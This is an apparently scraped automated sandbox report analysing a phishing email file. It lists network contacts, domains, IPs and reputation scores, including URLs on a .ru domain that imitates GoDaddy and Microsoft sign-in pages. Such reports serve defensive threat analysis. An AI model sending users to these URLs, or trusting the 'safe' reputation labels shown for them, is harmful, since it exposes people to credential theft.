https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.js0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-regular.woff0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/h/g/jsd/r/81bbd3f11f9128a60%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/info0%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/pages/1rd551.css?cb=16982512581650%Avira URL Cloudsafe
https://yxmaiypmfuyt.holdbitco.ru/web5/assets/cloudfavicon.ico0%Avira URL Cloudsafe
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
yxmaiypmfuyt.holdbitco.ru
104.21.0.95
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      cs1100.wpc.omegacdn.net
      152.199.4.44
      truefalse
        unknown
        accounts.google.com
        172.253.63.84
        truefalse
          high
          fastly-tls12-bam-cell.nr-data.net
          162.247.243.30
          truefalse
            unknown
            adfs.heart.org
            69.152.183.140
            truefalse
              high
              scontent.xx.fbcdn.net
              157.240.229.1
              truefalse
                high
                code.jquery.com
                151.101.194.137
                truefalse
                  high
                  d2vgu95hoyrpkh.cloudfront.net
                  3.162.103.20
                  truefalse
                    high
                    part-0012.t-0009.fb-t-msedge.net
                    13.107.226.40
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        high
                        adobe.com.ssl.d1.sc.omtrdc.net
                        63.140.38.180
                        truefalse
                          unknown
                          challenges.cloudflare.com
                          104.17.2.184
                          truefalse
                            high
                            www.google.com
                            172.253.122.105
                            truefalse
                              high
                              clients.l.google.com
                              172.253.62.101
                              truefalse
                                high
                                prod.adobeccstatic.com
                                99.86.229.114
                                truefalse
                                  unknown
                                  clients1.google.com
                                  unknown
                                  unknownfalse
                                    high
                                    use.typekit.net
                                    unknown
                                    unknownfalse
                                      high
                                      assets.adobedtm.com
                                      unknown
                                      unknownfalse
                                        high
                                        js-agent.newrelic.com
                                        unknown
                                        unknownfalse
                                          high
                                          aadcdn.msftauth.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            cdn.socket.io
                                            unknown
                                            unknownfalse
                                              high
                                              connect.facebook.net
                                              unknown
                                              unknownfalse
                                                high
                                                clients2.google.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  p.typekit.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    bam-cell.nr-data.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://yxmaiypmfuyt.holdbitco.ru/web5/validatecaptchafalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7false
                                                        high
                                                        https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages.min.js?cb=1698251258165false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://yxmaiypmfuyt.holdbitco.ru/web5/assets/key.pngfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://yxmaiypmfuyt.holdbitco.ru/web5/assets/officelogo.pngfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages-head-web.min.js?cb=1698251258165false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/81bbd40e1eca59f1/1698251262359/c912553020a62bc88929094fb0f47f021340c58c3915a7cab0eeab2d7f05bdc5/cUDw1TYUdlDKuMRfalse
                                                          high
                                                          https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svgfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-vf.woff2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://yxmaiypmfuyt.holdbitco.ru/web5/assets/godaddy-microsoftlogo.pngfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://yxmaiypmfuyt.holdbitco.ru/web5/assets/godaddy-logo.pngfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-bold.woff2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                            high
                                                            https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                              high
                                                              https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-regular.wofffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://yxmaiypmfuyt.holdbitco.ru/web5/infofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/h/g/jsd/r/81bbd3f11f9128a6false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://yxmaiypmfuyt.holdbitco.ru/web5/assets/cloudfavicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcfalse
                                                                unknown
                                                                https://yxmaiypmfuyt.holdbitco.ru/web5/assets/pages/1rd551.css?cb=1698251258165false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://shell.suite.office.com:1443E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                  high
                                                                  https://autodiscover-s.outlook.com/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                    high
                                                                    https://useraudit.o365auditrealtimeingestion.manage.office.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                      high
                                                                      https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=csschromecache_125.4.drfalse
                                                                        high
                                                                        https://outlook.office365.com/connectorsE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                          high
                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                            high
                                                                            https://cdn.entity.E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                              high
                                                                              https://rpsticket.partnerservices.getmicrosoftkey.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://lookup.onenote.com/lookup/geolocation/v1E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                high
                                                                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                  high
                                                                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                    high
                                                                                    https://api.aadrm.com/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_125.4.drfalse
                                                                                      high
                                                                                      https://www.internalfb.com/intern/invariant/chromecache_114.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://play.google.com/store/apps/details?id=com.facebook.orcachromecache_114.4.drfalse
                                                                                        high
                                                                                        https://www.yammer.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                          high
                                                                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                            high
                                                                                            https://api.microsoftstream.com/api/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                high
                                                                                                https://cr.office.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                  high
                                                                                                  https://res.getmicrosoftkey.com/api/redemptioneventsE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://tasks.office.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                    high
                                                                                                    https://officeci.azurewebsites.net/api/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://my.microsoftpersonalcontent.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://store.office.cn/addinstemplateE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://messaging.engagement.office.com/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                      high
                                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                        high
                                                                                                        https://www.odwebp.svc.msE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://api.powerbi.com/v1.0/myorg/groupsE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                          high
                                                                                                          https://web.microsoftstream.com/video/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                            high
                                                                                                            https://api.addins.store.officeppe.com/addinstemplateE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://graph.windows.netE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                              high
                                                                                                              https://consent.config.office.com/consentcheckin/v1.0/consentsE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                high
                                                                                                                https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                  high
                                                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                    high
                                                                                                                    https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_125.4.drfalse
                                                                                                                      high
                                                                                                                      https://d.docs.live.netE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://ncus.contentsync.E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                        high
                                                                                                                        http://weather.service.msn.com/data.aspxE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                          high
                                                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                            high
                                                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                              high
                                                                                                                              https://pushchannel.1drv.msE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                high
                                                                                                                                https://wus2.contentsync.E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://clients.config.office.net/user/v1.0/iosE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_125.4.drfalse
                                                                                                                                    high
                                                                                                                                    https://api.addins.omex.office.net/api/addins/searchE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://entitlement.diagnostics.office.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://outlook.office.com/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://storage.live.com/clientlogs/uploadlocationE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://login.microsoftonline.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://clients.config.office.net/c2r/v1.0/InteractiveInstallationE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://graph.windows.net/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://devnull.onenote.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://messaging.office.com/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://skyapi.live.net/Activity/E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://api.cortana.aiE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://messaging.action.office.com/setcampaignactionE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://staging.cortana.aiE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://hammerjs.github.io/chromecache_128.4.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://onedrive.live.com/embed?E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://augloop.office.comApp1698251227486805100_2A419441-EC7B-423B-A6D1-083834C84BA5.log.0.dr, E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_125.4.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://api.diagnosticssdf.office.com/v2/fileE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://use.typekit.net/af/650f2d/00000000000000007735dada/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_125.4.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://api.diagnostics.office.comE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.office.de/addinstemplateE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://wus2.pagecontentsync.E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://api.powerbi.com/v1.0/myorg/datasetsE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://cortana.ai/apiE8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      63.140.38.186
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                                                                                      172.253.63.84
                                                                                                                                                                                      accounts.google.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      63.140.38.180
                                                                                                                                                                                      adobe.com.ssl.d1.sc.omtrdc.netUnited States
                                                                                                                                                                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                                                                                                                      104.17.3.184
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      162.247.243.30
                                                                                                                                                                                      fastly-tls12-bam-cell.nr-data.netUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      3.162.103.20
                                                                                                                                                                                      d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                      35.190.80.1
                                                                                                                                                                                      a.nel.cloudflare.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      172.253.62.101
                                                                                                                                                                                      clients.l.google.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      172.253.122.105
                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      104.21.0.95
                                                                                                                                                                                      yxmaiypmfuyt.holdbitco.ruUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      157.240.229.1
                                                                                                                                                                                      scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                      32934FACEBOOKUSfalse
                                                                                                                                                                                      172.253.122.102
                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                      99.86.229.114
                                                                                                                                                                                      prod.adobeccstatic.comUnited States
                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                      104.17.2.184
                                                                                                                                                                                      challenges.cloudflare.comUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      104.17.25.14
                                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                      192.168.2.30
                                                                                                                                                                                      Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                                                                      Analysis ID:1332045
                                                                                                                                                                                      Start date and time:2023-10-25 18:26:36 +02:00
                                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 5m 5s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample file name:EXTERNAL DESERT FORREST NURSERY LLC.msg
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal52.phis.winMSG@21/80@54/18
                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .msg
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.113.194.132, 172.253.122.94, 52.85.151.6, 52.85.151.64, 52.85.151.60, 52.85.151.108, 23.45.233.19, 23.45.233.33, 104.76.105.46, 34.104.35.123, 23.45.233.56, 23.45.233.9, 192.229.211.108, 67.26.241.254, 20.189.173.11, 34.193.227.236, 18.207.85.246, 54.144.73.197, 107.22.247.231, 18.67.65.3, 18.67.65.94, 18.67.65.55, 18.67.65.110, 151.101.66.137, 151.101.2.137, 151.101.194.137, 151.101.130.137, 162.247.241.2, 52.168.117.170, 20.189.173.13, 52.168.112.66, 13.69.109.130, 142.251.111.95, 142.251.16.95, 172.253.63.95, 142.251.167.95, 172.253.122.95, 172.253.115.95, 142.251.163.95, 172.253.62.95
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, tls12.newrelic.com.cdn.cloudflare.net, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, a1874.dscg1.akamai.net, ecs-office.s-0005.s-msedge.net, onedscolprdweu00.westeurope.cloudapp.azure.com, ocsp.digicert.com, use-stls.adobe.com.edgesuite.net, onedscolprdwus10.westus.cloudapp.azure.com, update.googleapis.com, officeclient.microsoft.com, onedscolprdeus13.eastus.cloudapp.azure.com, global-entry-afdthirdparty-fallback.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, sstats.adobe.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdeus01.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, aadcdn.msauth.net, s-0005-office.config.skype.com, k.sni.global.fastly.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, p.typekit.ne
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • VT rate limit hit for: EXTERNAL DESERT FORREST NURSERY LLC.msg
                                                                                                                                                                                      No simulations
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      162.247.243.30https://indd.adobe.com/view/04da3dcd-babf-4a17-b031-c4c2d403dad3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        https://indd.adobe.com/view/04da3dcd-babf-4a17-b031-c4c2d403dad3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          https://indd.adobe.com/view/ecfd8a47-fb49-466d-b6f8-06972be415b9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            https://indd.adobe.com/view/c089ead8-c655-4f75-ab21-1b5eeada85bbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              https://indd.adobe.com/view/5eb686c7-e31b-4c1f-8ad0-cf1a37f20154Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                https://indd.adobe.com/view/5f7714ac-da2f-40ee-93ae-322c7d864a27Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  https://indd.adobe.com/view/7fb88d17-7f21-4255-93b8-9c578ee40b90Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    https://indd.adobe.com/view/c1412c4f-5c34-4a1e-82b1-878cf9b9490cGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      http://bugsbunnyy.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        https://dracoon.team/public/download-shares/l3GpXkPu7F4Dvnpdfr2ZPQf3z036y3RiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          https://indd.adobe.com/view/692d3894-9f28-44c1-8b82-05d950eeaf9dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            http://indd.adobe.com/view/5da22bb4-a743-4efb-bccd-f0648a977916Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              TEAM CONNEXT.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                https://indd.adobe.com/view/186f21cf-5e39-4f90-836d-e03f056dc975Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://indd.adobe.com/view/d3e9e435-fd3a-48af-9c4d-75f529a9f071Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    https://indd.adobe.com/view/ed3a6e5d-718a-4c83-bc17-2cec13b3ea30Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      https://indd.adobe.com/view/205db32d-3613-4559-9bf5-05abe6714f63Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        https://indd.adobe.com/view/d7d20f2c-4531-4811-8f95-41d8e210eea6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          https://indd.adobe.com/view/4e60f04f-8f99-4524-9420-b3f20b97ade9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            NorthStar Memorial Funding -Portfolio and Statement`.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                              63.140.38.186https://u36665958.ct.sendgrid.net/ls/click?upn=uMWgPPJt-2FbKCA0IqPU3PNz59O81oUpY-2B0Yk9-2F-2Bct3AG7rSFMVA4EstS5JvFxI6OWVVO7_kmafW9zCDTjZ2Ojpygi9Cy7qEh9qL3JOb55dpP4jH-2F-2BFfXwbzM-2FH0Lc2mS9bwvN7W8OpAtTBMB4NuTrXg8DZxVC57VdBxSPdbTVNzYRQ8k-2BZW1AOt-2FuIGAwyJsU63zS5Pp6lenxGEHhANV15oLie9TkXPowiqLErp0H0Mim3wZqbtNxpkFyEx8iZqddTgmjIOGBlZX40jbXya-2B35FAgoCQ-3D-3D#offer/001mu/120/dxsug/i2f/41/79Get hashmaliciousPhisherBrowse
